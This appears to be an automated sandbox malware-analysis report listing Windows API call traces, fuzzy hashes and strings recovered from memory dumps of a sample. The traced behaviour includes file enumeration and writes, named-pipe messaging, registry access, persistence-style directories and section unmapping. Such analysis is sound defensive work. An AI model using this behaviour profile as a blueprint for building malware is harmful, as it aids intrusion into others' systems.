  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
